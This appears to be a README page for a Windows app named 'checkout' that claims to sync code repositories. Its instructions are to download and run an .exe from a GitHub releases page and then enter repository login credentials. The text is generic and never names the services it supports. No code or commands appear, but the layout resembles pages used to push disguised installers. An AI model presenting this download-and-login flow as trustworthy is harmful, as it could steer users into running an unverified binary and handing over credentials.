📦 checkout - Simple tools to manage project repositories

Download

🎯 About checkout

The checkout application helps you manage your programming projects. You use it to pull code from online storage sites to your local computer. It handles the movement of files between your machine and remote servers. This tool saves time when you work on software projects across different computers. It keeps your workspace organized and ensures you have the files you need to start your work.

⚙️ System Requirements

Your computer must meet these standards to run the application:

  • Windows 10 or Windows 11 operating system.
  • At least 200 megabytes of free space on your hard drive.
  • An active internet connection to download and sync your files.
  • Basic user permissions to install software on your machine.

📥 How to Install

Follow these steps to install the software on your Windows computer:

  1. Visit the project release page: https://github.com/schynix/checkout/releases
  2. Look for the most recent version at the top of the list.
  3. Click the link that ends in .exe to start the download.
  4. Save the file to your desktop or your downloads folder.
  5. Double-click the file to begin the setup.
  6. Follow the instructions on the screen to finish the installation.

The software creates a shortcut on your desktop once the process ends. You can launch the program from there.

🚀 Getting Started

Launch the app from your desktop shortcut. You see a login screen for your repository account. Enter your account information to link the application to your online storage. Once the app verifies your details, it asks you to choose a folder on your computer. This folder acts as your workspace.

Pick an empty folder to avoid conflicts with existing files. After you select your workspace, the app lists all your available projects. Click on any project name to pull the files onto your machine. The status bar at the bottom tells you when the sync completes.

🛠️ Managing Your Projects

The main screen shows a list of your active projects. Use the buttons on the right side to manage these items. You can refresh the list if you add new projects to your online account. If you finish a task, click the remove button to clear the project from your local machine. This action does not delete your files from the online source; it only removes the local copy from your computer.

You can change the location of your workspace at any time in the settings menu. Open the menu by clicking the gear icon in the top right corner. Select a new folder and click save. The app moves your configuration to the new location automatically.

📝 Common Questions

Does this app save my password? The app stores your login credentials in the secure Windows Credential Manager. It does not store your password in a plain text file.

Can I use this with other services? The application connects specifically to the services described in the setup menu. Check the settings to see if your preferred provider is on the list.

What happens if the internet cuts out? The application pauses the transfer. It resumes once your connection returns to normal. You do not lose progress on files that finished syncing.

How do I update the application? The app checks for updates every time you open it. It displays a notification with a link if a newer version is available. Click the link to download the update.

🛡️ Privacy and Safety

Your data stays on your machine and the remote server. The application does not send your personal files to any third-party marketing services. It only sends logs to the developers to help fix errors and improve stability. You can turn off data reporting in the preferences menu under the privacy tab.

💡 Troubleshooting

If the application fails to open, try to restart your computer. If the problem continues, delete the application and download the installer again from the main link. Ensure your firewall allows the program to access the internet. You can find more help in the documentation folder inside the installation directory.
